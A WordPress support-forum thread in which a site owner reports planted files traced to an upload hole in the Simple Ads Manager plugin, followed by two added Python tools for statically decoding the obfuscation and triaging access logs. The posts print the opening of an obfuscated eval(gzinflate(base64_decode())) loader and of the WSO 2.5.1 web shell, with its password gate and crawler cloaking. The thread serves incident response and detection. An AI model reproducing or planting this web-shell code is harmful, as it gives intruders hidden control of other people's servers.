Title: wp-content/uploads/sam_conf.php
Last modified: August 22, 2016

---

# wp-content/uploads/sam_conf.php

 *  [msebald](https://wordpress.org/support/users/msebald/)
 * (@msebald)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/)
 * Hello,
 * the Wordfence plugin was complaining about a file wp-content/uploads/sam_conf.php
   with 3511 bytes – I checked it just now and it really looks strange.
   Also because it is not present on other websites where I have SAM running. It
   is dated from March 10th. Checking the webserver logs I find POST and GET requests
   on that file from an IP based in Hong Kong (not the typical user on our website).
   Also someone was looking for that file earlier in the SAM plugin directory (the
   reason why I write here) – where no such file is.
 * The file starts with:
 * `<?php ${"\x47LOB\x41\x4c\x53"}["\x76\x72vw\x65y\x70\x7an\x69\x70\x75"]="a";${"\x47\x4cOBAL\x53"}["\x67\x72\x69u\x65\x66\x62\x64\x71c"]="\x61\x75\x74h\x5fpas\x73";${"\x47\x4cOBAL\x53"}["\x63\x74xv\x74\x6f\x6f\x6bn\x6dju"]="\x76";${"\x47\x4cO\x42A\x4cS"}["p\x69\x6fykc\x65\x61"]="def\x61ul\x74\x5fu\x73\x65_\x61j\x61\x78";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["i\x77i\x72\x6d\x78l\x71tv\x79p"]="defa`
 * It looks like my system has been hijacked or something like this?
 * Well, as a first action I moved the file away from the webspace.
 * Any ideas?
 * Cheers,
    Martin
 * [https://wordpress.org/plugins/simple-ads-manager/](https://wordpress.org/plugins/simple-ads-manager/)

Viewing 7 replies - 1 through 7 (of 7 total)

 *  Thread Starter [msebald](https://wordpress.org/support/users/msebald/)
 * (@msebald)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894573)
 * Ok, just found two other suspicious files:
 * wp-content/plugins/simple-ads-manager/sam-config-sample.php (March 6th)
    wp-content/uploads/wp-config-sample.php (March 7th)
 * As both files are not on other WP installations I run I removed those files.
 * It seems like it started with sam-config-sample.php on March 6th.
 * I checked all other files on this webspace and it seems that no other files have
   been changed. At least the file date is older than March 6th…
 * The files' content looks suspicious. wp-config-sample.php is also encoded like
   the first file in my first post (BTW: Where can I decode such files to see the
   real content?). sam-config-sample.php is not (which makes it look REALLY suspicious,
   even for a non-programmer, as it checks for system stuff, PHP functions and a
   lot more). Here are the beginnings of both files:
 * wp-config-sample.php:
 *     ```
       <?php
       $auth_pass = "xxx";
       $color = "#df5";
       $default_action = 'FilesMan';
       $default_use_ajax = true;
       $default_charset = 'Windows-1251';
       preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'5b19fxq30jD8d/wp5C3tQoMx4CQnxYY4cezEebFTvyRp4tx0gQW2Xli6u5i4qb/7PTN6WWlfME57rut+fk/OacJKo9FIGo1Go9HIG5bX3cksvi6Xuqf7J+/3Tz7bL8/O3nXP4av79MX+0Zn9pVJh39YY/CnNIzd8OnKnccTazAlD57psvQiCke9aVWad+vNwhj/enh49C2L85TldJ+yPvSs3xM/fnOnA/Yq/TpxJz4fEyjZh9oblWeiOuhMn7o/L9qbNasybzPxg4Jbtv+2qXnUF8uxNDxNXoBn/jF1n4IZlgtps1OrsQf0BOwpidhDMpwNb0IB/3K9ezL9u1m7W1na9qdeN3Lhsu2EYhF0/GNnVo/M3b6BIkgepXcqP7GrdyJk4X7vuV7c/j71g2o29iSsgIJc+u7438eKySps4I6/f/XMexG7UDedThOG5A3foTaEz
       ```
   
 * (I replaced the auth_pass by “xxx”.)
 * sam-config-sample.php:
 *     ```
       <?php
   
       $auth_pass="xxx";
       $color = "#df5";
       $default_action = 'FilesMan';
       $default_use_ajax = true;
       $default_charset = 'Windows-1251';
   
       if(!empty($_SERVER['HTTP_USER_AGENT'])) {
           $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
           if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
               header('HTTP/1.0 404 Not Found');
               exit;
           }
       }
   
       @ini_set('error_log',NULL);
       @ini_set('log_errors',0);
       @ini_set('max_execution_time',0);
       @set_time_limit(0);
       @set_magic_quotes_runtime(0);
       @define('WSO_VERSION', '2.5.1');
   
       if(get_magic_quotes_gpc()) {
               function WSOstripslashes($array) {
                       return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
               }
               $_POST = WSOstripslashes($_POST);
           $_COOKIE = WSOstripslashes($_COOKIE);
       }
   
       function wsoLogin() {
               die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
       }
   
       function WSOsetcookie($k, $v) {
           $_COOKIE[$k] = $v;
           setcookie($k, $v);
       }
   
       if(!empty($auth_pass)) {
           if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
               WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
   
           if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
               wsoLogin();
       }
       ```
   
 * (I replaced the auth_pass by “xxx” here, too.)
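
On the question of decoding such files: the `\xNN` sequences are ordinary PHP string escapes, and the `preg_replace` argument in the excerpt above spells out an `eval(gzinflate(base64_decode(` wrapper. The sketch below is an added example, not part of the original posts; it undoes both statically, never executes the input, and goes slightly beyond the excerpt by handling nested wrappers. `make_sample` and its harmless payload are constructed for the demonstration.

```python
import base64
import re
import zlib

HEX_ESC = re.compile(r"\\x([0-9A-Fa-f]{2})")
# eval(gzinflate(base64_decode('<blob>'  -- the wrapper named in the excerpt
WRAPPER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1",
    re.IGNORECASE,
)

def unescape_hex(php_source: str) -> str:
    """Replace PHP \\xNN escapes with their characters; nothing else is interpreted."""
    return HEX_ESC.sub(lambda m: chr(int(m.group(1), 16)), php_source)

def peel(php_source: str, max_layers: int = 10):
    """Statically unwrap nested eval(gzinflate(base64_decode(...))) layers.

    Returns (layers_removed, innermost_text). The input is never executed."""
    text = unescape_hex(php_source)
    layers = 0
    while layers < max_layers:
        m = WRAPPER.search(text)
        if not m:
            break
        try:
            raw = base64.b64decode(m.group(2))
            # PHP's gzinflate() reads raw DEFLATE, hence wbits=-15
            text = unescape_hex(zlib.decompress(raw, -15).decode("latin-1"))
        except (ValueError, zlib.error):
            break  # damaged or incomplete blob: keep what was recovered so far
        layers += 1
    return layers, text

def make_sample(inner: str) -> str:
    """Constructed test input: wrap harmless text the way the excerpt is wrapped."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    blob = base64.b64encode(c.compress(inner.encode()) + c.flush()).decode()
    head = "".join("\\x%02X" % ord(ch) for ch in "eval(gzinflate(base64_decode(")
    return 'preg_replace("/.*/e","%s\'%s\'\\x29\\x29\\x29;",".");' % (head, blob)

if __name__ == "__main__":
    print(unescape_hex(r'${"\x47LOB\x41\x4c\x53"}'))  # variable name from the first post
    print(peel(make_sample(make_sample("echo 'benign sample';"))))
```
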
 *  Plugin Author [minimus](https://wordpress.org/support/users/minimus/)
 * (@minimus)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894677)
 * These files **are not part** of the original set of files of the SAM plugin!
 *  Thread Starter [msebald](https://wordpress.org/support/users/msebald/)
 * (@msebald)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894683)
 * Yes I know. Interesting that they show up in this directory and under these names.
 * I checked everything with Wordfence, did not find anything more than these three
   files. Also no other files altered.
 *  [vashmyvindows](https://wordpress.org/support/users/vashmyvindows/)
 * (@vashmyvindows)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894831)
 * I just want to add my experience here — one of my client’s sites was hijacked
   last week, and most of the infected files seem to be in the SAM plugin folder.
   The WordPress install and all plugins were up to date, I believe.
 * I’m seeing malicious “sam_conf.php” and “sam-config-sample.php” in the SAM plugin
   folder. The intruder left several malicious files on the root of the site with
   names like “cache.php” and “402.php”, and a few such files in /wp-admin and
   /wp-includes.
 * I don’t know if the hack was enabled by a vulnerability in SAM, but it might 
   be a good idea to investigate!
 *  [Kevin Cristiano](https://wordpress.org/support/users/kcristiano/)
 * (@kcristiano)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894859)
 * Can you post an update here since you have pushed out a new version? It would
   be good to know what you found — now that it has been corrected.
 * Thanks.
 *  Plugin Author [minimus](https://wordpress.org/support/users/minimus/)
 * (@minimus)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894861)
 * I removed unused code from the file sam-ajax-admin.php. Attackers could use this
   piece of code to upload files to the server.
 *  Thread Starter [msebald](https://wordpress.org/support/users/msebald/)
 * (@msebald)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/wp-contentuploadssam_confphp/#post-5894868)
 * So SAM was the reason for my problems. Good to know and thank you for digging
   into this and releasing a patched version.
 * Did you get any further information about what happened when a website was affected
   by hackers?
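
The thread gives two things to look for in access logs: requests to PHP files under `wp-content/uploads`, and POSTs to `sam-ajax-admin.php`, the file the plugin author names as the upload path. The following is an added example, not code from the thread or the plugin; Combined Log Format is assumed, and the log lines, IP addresses, dates and the directory shown for `sam-ajax-admin.php` are constructed.

```python
import re
from collections import defaultdict

# Combined Log Format prefix: ip - - [time] "METHOD path PROTO" status
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3})')
# PHP should never be served out of the media uploads tree
UPLOADS_PHP = re.compile(r"/wp-content/uploads/[^?\s]*\.php(?:[?/]|$)", re.I)
# File named by the plugin author; its directory is not given in the thread
HANDLER = re.compile(r"/sam-ajax-admin\.php(?:\?|$)", re.I)

def triage(lines):
    """Group matching requests by client IP.

    Returns {ip: {"handler_posts": [...], "uploads_php": [...]}}; each entry
    is (timestamp, method, path, status). Unparseable lines are skipped."""
    hits = defaultdict(lambda: {"handler_posts": [], "uploads_php": []})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        rec = (ts, method, path, int(status))
        if method == "POST" and HANDLER.search(path):
            hits[ip]["handler_posts"].append(rec)
        if UPLOADS_PHP.search(path):
            hits[ip]["uploads_php"].append(rec)
    return dict(hits)

def correlate(hits):
    """IPs that POSTed to the handler AND got HTTP 200 from a PHP file in uploads.

    A handler POST alone can be normal admin traffic; the pairing is the signal."""
    return sorted(ip for ip, h in hits.items()
                  if h["handler_posts"] and any(r[3] == 200 for r in h["uploads_php"]))

# Constructed sample lines (documentation IP ranges, placeholder dates)
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2000:10:00:00 +0000] "POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1" 200 15',
    '203.0.113.7 - - [01/Jan/2000:10:00:05 +0000] "GET /wp-content/uploads/sam_conf.php HTTP/1.1" 200 3511',
    '203.0.113.7 - - [01/Jan/2000:10:00:09 +0000] "POST /wp-content/uploads/sam_conf.php HTTP/1.1" 200 9120',
    '198.51.100.4 - - [01/Jan/2000:10:01:00 +0000] "GET /wp-content/uploads/2000/01/logo.png HTTP/1.1" 200 4096',
    '198.51.100.9 - - [01/Jan/2000:10:02:00 +0000] "GET /wp-content/uploads/wp-config-sample.php HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    found = triage(SAMPLE)
    print(correlate(found), {ip: len(h["uploads_php"]) for ip, h in found.items()})
```
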
